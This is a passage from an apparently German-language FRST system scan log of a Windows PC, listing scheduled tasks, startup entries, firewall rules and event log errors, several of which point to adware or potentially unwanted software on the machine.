(Adobe Systems Incorporated) Task: {2D33A450-57FF-4A00-AE28-E87E56431EBE} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-12-19] (Adobe Systems Incorporated) Task: {4E8F7D37-0852-4EDC-861C-E3D03ECBABA7} - System32\Tasks\Opera scheduled Autoupdate 1438940281 => C:\Program Files (x86)\Opera\launcher.exe [2015-09-11] (Opera Software) Task: {69CAC2C9-9E20-47E3-9AAC-5005640B912E} - System32\Tasks\GoogleUpdateTaskMachineCore1d0925912504720 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) Task: {6D06CB31-009E-45FA-A9FE-85EEEF758F7C} - System32\Tasks\Adobe Reader and Acrobat Manager => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-12-19] (Adobe Systems Incorporated) Task: {6D47D039-18B5-44B4-8059-2A192F7A2F7E} - System32\Tasks\GoogleUpdateTaskMachineUA1d0925912f22c70 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) Task: {80ACD03E-D8E8-47EB-B041-F165F30E230D} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) Task: {9200AA28-5EB6-4EAD-BF4E-CDF0410B5CF9} - System32\Tasks\{A3BB51D3-1E67-46C5-8ED5-8734DECD6918} => Chrome.exe hxxp://www.skype.com/go/downloading?source=lightinstaller&ver=5.3.0.111.261&LastError=404 Task: {A23C2641-27E1-4303-8187-0DBF0233649C} - System32\Tasks\JetBoost_AutoUpdate => C:\Program Files (x86)\BlueSprig\JetBoost\AutoUpdate.exe [2012-11-27] (BlueSprig) Task: {B304FCBA-F8AD-455F-95F7-BBA64D8987AB} - System32\Tasks\GoogleUpdateTaskMachineUA1d00016545d4e90 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) Task: {B4A8F9FA-04C0-40CF-95EB-AE47E2BB4073} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe Task: {C1019F60-C40C-40F9-99E0-A20254841B65} - System32\Tasks\{AFE2C666-2C4F-49BB-B86B-2CC7B241F441} => pcalua.exe -a "C:\Users\Kenny G\Desktop\bewerbung\bitdefender_isecurity.exe" -d "C:\Users\Kenny G\Desktop\bewerbung" Task: {C4EDDEAE-BCF6-49B9-A64D-CACA20F51E9E} - System32\Tasks\GoogleUpdateTaskMachineCore1d04548885af2c0 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) Task: {C7A41BF4-00C0-4FC0-A9C1-22B5B9F7ACC5} - System32\Tasks\{7AD56248-245F-4D20-B2FB-3A38DD4D9679} => pcalua.exe -a "C:\Program Files (x86)\InstallShield Installation Information\{0FBD9ABF-7DA0-463E-A7DC-A394052CC9A8}\Setup.exe" -c -runfromtemp -l0x0407 -removeonly Task: {CB8F7966-49EF-42D7-B59C-81E070B86191} - System32\Tasks\GoogleUpdateTaskMachineUA1d0454889312e80 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) Task: {EFCA144A-E45A-4877-8FAD-E51248235D56} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.) Task: C:\Windows\Tasks\Adobe Flash Player PPAPI Notifier.job => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_18_0_0_232_pepper.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore1d04548885af2c0.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore1d0925912504720.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d00016545d4e90.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d0454889312e80.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d0925912f22c70.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe ==================== Geladene Module (Nicht auf der Ausnahmeliste) ============== 2015-06-02 09:01 - 2015-08-26 11:33 - 01205136 _____ () C:\Program Files (x86)\AVG Web TuneUp\WtuSystemSupport.exe 2013-11-03 19:09 - 2013-10-23 10:20 - 00102176 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll 2014-01-15 20:58 - 2014-01-15 21:16 - 00076888 _____ () C:\Windows\SysWOW64\PnkBstrA.exe 2015-09-19 11:34 - 2015-09-19 11:34 - 01610240 _____ () C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\knsl4AC.tmpfs 2013-09-13 19:51 - 2013-09-13 19:51 - 00087952 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll 2013-09-13 19:51 - 2013-09-13 19:51 - 01242952 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll ==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ========= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.) AlternateDataStreams: C:\ProgramData\TEMP:373E1720 AlternateDataStreams: C:\Users\eLoot\Downloads\Photoshop_Portable_12.1_Multilingual.exe:BDU AlternateDataStreams: C:\Users\eLoot\Downloads\Photoshop_Portable_13.1.2_x64_Multilingual.exe:BDU AlternateDataStreams: C:\Users\eLoot\Downloads\torbrowser-install-3.5.2_de.exe:BDU AlternateDataStreams: C:\Users\Kenny G\Downloads\HiJackThis204.exe:BDU AlternateDataStreams: C:\Users\Kenny G\Downloads\jetboost-setup-2.0.0.exe:BDU AlternateDataStreams: C:\Users\Kenny G\Downloads\SetupCasino_aad73b_de.exe:BDU AlternateDataStreams: C:\Users\Kenny G\Downloads\SetupPoker_5fabb7.exe:BDU AlternateDataStreams: C:\Users\Kenny G\Downloads\TitanBSetup_5c0cd5.exe:BDU AlternateDataStreams: C:\Users\Tabea Studium\Downloads\Shockwave_Installer_Slim.exe:BDU ==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) =================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.) ==================== EXE Verknüpfungen (Nicht auf der Ausnahmeliste) =============== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.) ==================== Internet Explorer Vertrauenswürdig/Eingeschränkt =============== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.) IE trusted site: HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\localhost -> localhost IE trusted site: HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\webcompanion.com -> hxxp://webcompanion.com ==================== Andere Bereiche ============================ (Aktuell gibt es keinen automatisierten Fix für diesen Bereich.) HKU\S-1-5-21-682121585-3582832733-1082443493-1000\Control Panel\Desktop\\Wallpaper -> DNS Servers: 192.168.2.1 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Windows Firewall ist aktiviert. ==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge == (Aktuell gibt es keinen automatisierten Fix für diesen Bereich.) MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^McAfee Security Scan Plus.lnk => C:\Windows\pss\McAfee Security Scan Plus.lnk.CommonStartup MSCONFIG\startupfolder: C:^Users^Kenny G^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Dropbox.lnk => C:\Windows\pss\Dropbox.lnk.Startup MSCONFIG\startupfolder: C:^Users^Kenny G^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^MyPC Backup.lnk => C:\Windows\pss\MyPC Backup.lnk.Startup MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe" MSCONFIG\startupreg: Bdagent => "C:\Program Files\Bitdefender\Bitdefender 2015\bdagent.exe" MSCONFIG\startupreg: Bitdefender-Geldb�rse => MSCONFIG\startupreg: Bitdefender-Geldb�rse-Anwendungs-Agent => MSCONFIG\startupreg: CyberGhost => "C:\Program Files\CyberGhost 5\CyberGhost.exe" /autostart /min MSCONFIG\startupreg: FreeAC => C:\Program Files (x86)\FreeAlarmClock\FreeAlarmClock.exe -autorun MSCONFIG\startupreg: GoogleChromeAutoLaunch_9CD6D292798361639A68D2D1D9501714 => "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-startup-window MSCONFIG\startupreg: icq => C:\Users\Kenny G\AppData\Roaming\ICQM\icq.exe -CU MSCONFIG\startupreg: InstallerLauncher => "C:\Program Files\Common Files\Bitdefender\SetupInformation\{6F57816A-791A-4159-A75F-CFD0C7EA4FBF}\setuplauncher.exe" /run:"C:\Program Files\Common Files\Bitdefender\SetupInformation\{6F57816A-791A-4159-A75F-CFD0C7EA4FBF}\Installer.exe" MSCONFIG\startupreg: iTunesHelper => "C:\Program Files (x86)\iTunes\iTunesHelper.exe" MSCONFIG\startupreg: mobilegeni daemon => C:\Program Files (x86)\Mobogenie\DaemonProcess.exe MSCONFIG\startupreg: Optimizer Pro => C:\Program Files (x86)\Optimizer Pro\OptProLauncher.exe MSCONFIG\startupreg: Sony PC Companion => "C:\Program Files (x86)\Sony\Sony PC Companion\PCCompanion.exe" /Background MSCONFIG\startupreg: Steam => "C:\Program Files (x86)\Steam\Steam.exe" -silent MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe" MSCONFIG\startupreg: vProt => "C:\Program Files (x86)\AVG Web TuneUp\vprot.exe" ==================== Firewall Regeln (Nicht auf der Ausnahmeliste) =============== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) FirewallRules: [{F1E8D03D-FFA2-42DD-A766-22ABE0AD0436}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe FirewallRules: [{A0A07BA7-2135-482B-8CF0-7D59DA237E7B}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe FirewallRules: [{15629829-3DD3-4A81-B20D-4255F55023B9}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe FirewallRules: [{51D8DA04-F385-4088-8779-22A2C6969D59}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe FirewallRules: [{1CD2F4D1-8114-4FBA-9D7E-4BFC8959B015}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe FirewallRules: [{1B40452A-2002-47A8-B02E-49C07A677A04}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe FirewallRules: [{B6489A7B-4235-4D96-99A9-EEDD6A2FE8BD}] => (Allow) C:\Program Files (x86)\iTunes\iTunes.exe FirewallRules: [{720D02FF-52F6-4154-A621-5AB2A3DB03A3}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe FirewallRules: [{C7AF308F-8BD1-41D4-A681-37A1C88C993A}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe FirewallRules: [{10736636-FB53-42C9-A3F4-529BAFEF521E}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe FirewallRules: [{750C88E5-8449-4ED6-87F6-6F9A40C73F22}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe FirewallRules: [{72A3B8D8-259B-478D-8EA1-E3F979D8CA18}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [{81B1EC25-555A-4F2F-9395-9FD97F51323B}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [{2C423E45-FD79-468B-B116-1FC2C2477842}] => (Allow) C:\Program Files (x86)\Sony Mobile\Update Engine\Sony Mobile Update Engine.exe FirewallRules: [{DA81D9C0-E7D2-4027-B0A5-A8A45C00F77D}] => (Allow) C:\Program Files (x86)\Sony Mobile\Update Engine\Sony Mobile Update Engine.exe FirewallRules: [{521249EF-E21D-4C4E-8C32-FDD3F208B733}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe FirewallRules: [{89E0E88B-D4E4-491D-A414-02FCD1F3D197}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe FirewallRules: [{1C8A9419-FD22-4DAA-A57C-F115A281A979}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Half-Life\hl.exe FirewallRules: [{8B608DD6-21BB-4A2E-8800-E7106712C6F0}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Half-Life\hl.exe FirewallRules: [{A1CF8413-A121-4594-8D4F-822D997AD1F7}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Battlefield Bad Company 2\BFBC2Game.exe FirewallRules: [{78D1B940-9035-4A6C-BF79-C39436D455B2}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Battlefield Bad Company 2\BFBC2Game.exe FirewallRules: [{9FD597A8-5DF3-405B-BF40-DAD0B4A3D331}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Battlefield Bad Company 2\Support\EA Help\Electronic_Arts_Technical_Support.htm FirewallRules: [{33EBB500-8307-46EF-8E6E-4044649E5550}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Battlefield Bad Company 2\Support\EA Help\Electronic_Arts_Technical_Support.htm FirewallRules: [{B2E37F34-F81A-4758-AE8C-6350303ED76A}] => (Allow) C:\Users\Kenny G\AppData\Roaming\ICQM\icq.exe FirewallRules: [{F8A57BC5-5370-4537-AD73-18A47D9490BA}] => (Allow) C:\Users\Kenny G\AppData\Roaming\ICQM\icq.exe FirewallRules: [{396CE83B-463E-4ABD-9DDF-3AAF00CF8FC2}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\TrackMania United\TmForever.exe FirewallRules: [{55CF9D3A-CEA1-4EE1-9710-588133F87671}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\TrackMania United\TmForever.exe FirewallRules: [{257241F5-DB72-4BCC-966A-EB960C45A132}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\TrackMania United\TmForeverLauncher.exe FirewallRules: [{B075E0A7-AA0A-476A-8E74-51E6DE493C7A}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\TrackMania United\TmForeverLauncher.exe FirewallRules: [{FECE91C7-34A5-4011-ACE9-0C45BCC3E776}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe FirewallRules: [{4F4A4AF0-A162-4CDE-A55E-56F506AF9332}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe FirewallRules: [{E2340314-D830-445B-ACFE-84B2490E2D2B}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Counter-Strike Source\hl2.exe FirewallRules: [{6E566919-5331-43A5-85E4-7B72D59CEE97}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Counter-Strike Source\hl2.exe FirewallRules: [{C86938D2-4623-4413-8927-C89AAE8215B2}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{CAB95473-AE42-4A88-A6CD-2019753F6D1F}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{8A3B2F36-312E-4CF7-A10A-E8D05CB2FD24}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgmfapx.exe FirewallRules: [{707E083B-17A4-43B5-A25F-F911B7A2478B}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgmfapx.exe FirewallRules: [{D466720C-AE72-408E-81DB-EF107F94C734}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe FirewallRules: [{875B4892-FDD1-4915-BE18-3D04DCB57C60}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe FirewallRules: [{2BCB0DB0-2EB2-4F78-8EEE-6E29EE0C7CFD}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgdiagex.exe FirewallRules: [{FCF89AD8-A839-4426-A4C5-771A89F905E3}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgdiagex.exe FirewallRules: [{9B5F71A5-ACE5-483E-8E24-4F704CB2BD56}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgemca.exe FirewallRules: [{165D76C1-CFCF-4A31-95F2-57AD4831602B}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgemca.exe FirewallRules: [TCP Query User{11D72B15-04AE-4224-98D0-4E863D33585C}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe FirewallRules: [UDP Query User{1E3DB40B-BE9E-42A4-8A07-6F1460C15F3A}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe FirewallRules: [TCP Query User{99D93149-D86B-4104-94D4-75AB15AAEBB6}C:\program files (x86)\libreoffice 4\program\soffice.bin] => (Allow) C:\program files (x86)\libreoffice 4\program\soffice.bin FirewallRules: [UDP Query User{32F3CAD3-4F49-4157-A353-BC565EEB431F}C:\program files (x86)\libreoffice 4\program\soffice.bin] => (Allow) C:\program files (x86)\libreoffice 4\program\soffice.bin FirewallRules: [{1AFD0420-A3E2-4D4C-89BF-9175F1E06A0C}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe FirewallRules: [{48969429-133A-4C3A-96AA-517EE6CD1645}] => (Allow) C:\Program Files (x86)\Max Driver Updater\maxdu.exe FirewallRules: [{FBEF1CE7-BE0B-4061-BD5F-A3965CC65AD6}] => (Allow) D:\Verkauf\powerpoint\Office15\outlook.exe ==================== Fehlerhafte Geräte im Gerätemanager ============= Konnte Geräte nicht auflisten. Überprüfen Sie den "winmgmt" Dienst oder reparieren Sie den WMI. ==================== Fehlereinträge in der Ereignisanzeige: ========================= Applikationsfehler: ================== Error: (09/20/2015 12:59:42 AM) (Source: SideBySide) (EventID: 33) (User: ) Description: Fehler beim Generieren des Aktivierungskontextes für "Resources32,processorArchitecture="x86",type="win32",version="2.7.4.0"1". Die abhängige Assemblierung "Resources32,processorArchitecture="x86",type="win32",version="2.7.4.0"" konnte nicht gefunden werden. Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe". Error: (09/19/2015 10:46:13 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Name der fehlerhaften Anwendung: Lavasoft.SearchProtect.WinService.exe, Version: 1.0.0.0, Zeitstempel: 0x5575d81f Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 6.1.7600.16385, Zeitstempel: 0x4a5bdfe0 Ausnahmecode: 0xe0434f4d Fehleroffset: 0x000000000000aa7d ID des fehlerhaften Prozesses: 0x1a14 Startzeit der fehlerhaften Anwendung: 0xLavasoft.SearchProtect.WinService.exe0 Pfad der fehlerhaften Anwendung: Lavasoft.SearchProtect.WinService.exe1 Pfad des fehlerhaften Moduls: Lavasoft.SearchProtect.WinService.exe2 Berichtskennung: Lavasoft.SearchProtect.WinService.exe3 Error: (09/19/2015 04:07:14 PM) (Source: MsiInstaller) (EventID: 1043) (User: NT-AUTORITÄT) Description: Fehler beim Beenden einer Windows Installer-Transaktion: PROPLUS. Fehler 1603 beim Beenden der Transaktion. Error: (09/19/2015 03:43:00 PM) (Source: MsiInstaller) (EventID: 11713) (User: KennyG-PC) Description: Product: Microsoft PowerPoint MUI (English) 2013 -- Error 1713. Setup cannot install one of the required products for Microsoft PowerPoint MUI (English) 2013. Error: (09/19/2015 03:37:40 PM) (Source: ESENT) (EventID: 215) (User: ) Description: WinMail (5048) WindowsMail0: Die Sicherung wurde abgebrochen, weil sie vom Client angehalten wurde, oder weil die Verbindung mit dem Client unterbrochen wurde. Error: (09/19/2015 12:44:19 PM) (Source: MsiInstaller) (EventID: 1043) (User: NT-AUTORITÄT) Description: Fehler beim Beenden einer Windows Installer-Transaktion: PROPLUS. Fehler 1603 beim Beenden der Transaktion. Error: (09/19/2015 12:33:11 PM) (Source: MsiInstaller) (EventID: 1043) (User: NT-AUTORITÄT) Description: Fehler beim Beenden einer Windows Installer-Transaktion: PROPLUS. Fehler 1603 beim Beenden der Transaktion. Error: (09/19/2015 12:15:54 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Name der fehlerhaften Anwendung: dnsridgewood.exe, Version: 1.0.0.0, Zeitstempel: 0x55c751a5 Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 6.1.7600.16385, Zeitstempel: 0x4a5bdfe0 Ausnahmecode: 0xe0434352 Fehleroffset: 0x000000000000aa7d ID des fehlerhaften Prozesses: 0x1bf0 Startzeit der fehlerhaften Anwendung: 0xdnsridgewood.exe0 Pfad der fehlerhaften Anwendung: dnsridgewood.exe1 Pfad des fehlerhaften Moduls: dnsridgewood.exe2 Berichtskennung: dnsridgewood.exe3 Error: (09/19/2015 12:15:49 PM) (Source: .NET Runtime) (EventID: 1026) (User: ) Description: Anwendung: dnsridgewood.exe Frameworkversion: v4.0.30319 Beschreibung: Der Prozess wurde aufgrund einer unbehandelten Ausnahme beendet. Ausnahmeinformationen: System.Runtime.InteropServices.COMException Stapel: bei System.Management.ManagementScope.Initialize() bei System.Management.ManagementObject.Initialize(Boolean) bei System.Management.ManagementClass.GetInstances(System.Management.EnumerationOptions) bei GreenTeamDNS.TcpIPWMI.setDNS(System.String, System.String) bei GreenTeamDNS.App.setProtectionLevel(Int32, Boolean) bei GreenTeamDNS.App.OnStartup(System.Windows.StartupEventArgs) bei System.Windows.Application.<.ctor>b__1(System.Object) bei System.Windows.Threading.ExceptionWrapper.InternalRealCall(System.Delegate, System.Object, Int32) bei MS.Internal.Threading.ExceptionFilterHelper.TryCatchWhen(System.Object, System.Delegate, System.Object, Int32, System.Delegate) bei System.Windows.Threading.Dispatcher.WrappedInvoke(System.Delegate, System.Object, Int32, System.Delegate) bei System.Windows.Threading.DispatcherOperation.InvokeImpl() bei System.Threading.ExecutionContext.runTryCode(System.Object) bei System.Runtime.CompilerServices.RuntimeHelpers.ExecuteCodeWithGuaranteedCleanup(TryCode, CleanupCode, System.Object) bei System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean) bei System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object) bei System.Windows.Threading.DispatcherOperation.Invoke() bei System.Windows.Threading.Dispatcher.ProcessQueue() bei System.Windows.Threading.Dispatcher.WndProcHook(IntPtr, Int32, IntPtr, IntPtr, Boolean ByRef) bei MS.Win32.HwndWrapper.WndProc(IntPtr, Int32, IntPtr, IntPtr, Boolean ByRef) bei MS.Win32.HwndSubclass.DispatcherCallbackOperation(System.Object) bei System.Windows.Threading.ExceptionWrapper.InternalRealCall(System.Delegate, System.Object, Int32) bei MS.Internal.Threading.ExceptionFilterHelper.TryCatchWhen(System.Object, System.Delegate, System.Object, Int32, System.Delegate) bei System.Windows.Threading.Dispatcher.WrappedInvoke(System.Delegate, System.Object, Int32, System.Delegate) bei System.Windows.Threading.Dispatcher.InvokeImpl(System.Windows.Threading.DispatcherPriority, System.TimeSpan, System.Delegate, System.Object, Int32) bei MS.Win32.HwndSubclass.SubclassWndProc(IntPtr, Int32, IntPtr, IntPtr) bei MS.Win32.UnsafeNativeMethods.DispatchMessage(System.Windows.Interop.MSG ByRef) bei System.Windows.Threading.Dispatcher.PushFrameImpl(System.Windows.Threading.DispatcherFrame) bei System.Windows.Application.RunInternal(System.Windows.Window) bei System.Windows.Application.Run() bei GreenTeamDNS.App.Main() Error: (09/18/2015 09:59:25 PM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: Task Scheduling Error: m->NextScheduledSPRetry 9765 Systemfehler: ============= Error: (09/20/2015 07:30:31 PM) (Source: Service Control Manager) (EventID: 7024) (User: ) Description: Der Dienst "AVGIDSAgent" wurde mit folgendem dienstspezifischem Fehler beendet: %%-536753635. Error: (09/20/2015 06:25:40 PM) (Source: Service Control Manager) (EventID: 7003) (User: ) Description: Der Dienst "Sicherheitscenter" ist von folgendem Dienst abhängig: Winmgmt. Dieser Dienst ist eventuell nicht installiert. Error: (09/20/2015 06:23:29 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Der Dienst "IE Search Set" wurde aufgrund folgenden Fehlers nicht gestartet: %%2 Error: (09/20/2015 06:23:17 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Der Dienst "LavasoftTcpService" wurde aufgrund folgenden Fehlers nicht gestartet: %%2 Error: (09/20/2015 06:23:17 PM) (Source: Service Control Manager) (EventID: 7003) (User: ) Description: Der Dienst "IP-Hilfsdienst" ist von folgendem Dienst abhängig: Winmgmt. Dieser Dienst ist eventuell nicht installiert. Error: (09/20/2015 06:23:17 PM) (Source: Service Control Manager) (EventID: 7003) (User: ) Description: Der Dienst "CyberGhost 5 Client Service" ist von folgendem Dienst abhängig: Winmgmt. Dieser Dienst ist eventuell nicht installiert. Error: (09/20/2015 06:21:44 PM) (Source: Service Control Manager) (EventID: 7032) (User: ) Description: Der Versuch des Dienststeuerungs-Managers, nach dem unerwarteten Beenden des Dienstes "Windows Search" Korrekturmaßnahmen (Neustart des Diensts) durchzuführen, ist fehlgeschlagen. Fehler: %%1056 Error: (09/20/2015 06:21:13 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Der Dienst "Windows Presentation Foundation-Schriftartcache 3.0.0.0" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 0 Millisekunden durchgeführt: Neustart des Diensts. Error: (09/20/2015 06:21:13 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Dienst "Disc Soft Lite Bus Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert. Error: (09/20/2015 06:21:12 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Der Dienst "Windows Search" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 30000 Millisekunden durchgeführt: Neustart des Diensts. CodeIntegrity: =================================== Date: 2015-09-09 00:48:00.156 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpa.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. Date: 2015-09-09 00:48:00.111 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpa.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. Date: 2015-09-09 00:48:00.054 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpa.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. Date: 2015-09-09 00:48:00.010 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpa.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. Date: 2015-09-09 00:47:59.933 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpx.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. Date: 2015-09-09 00:47:59.879 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpx.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. Date: 2015-09-09 00:47:59.840 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpx.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. Date: 2015-09-09 00:47:59.785 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpx.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. Date: 2015-08-31 13:46:58.975 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpa.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. Date: 2015-08-31 13:46:58.935 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpa.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. ==================== 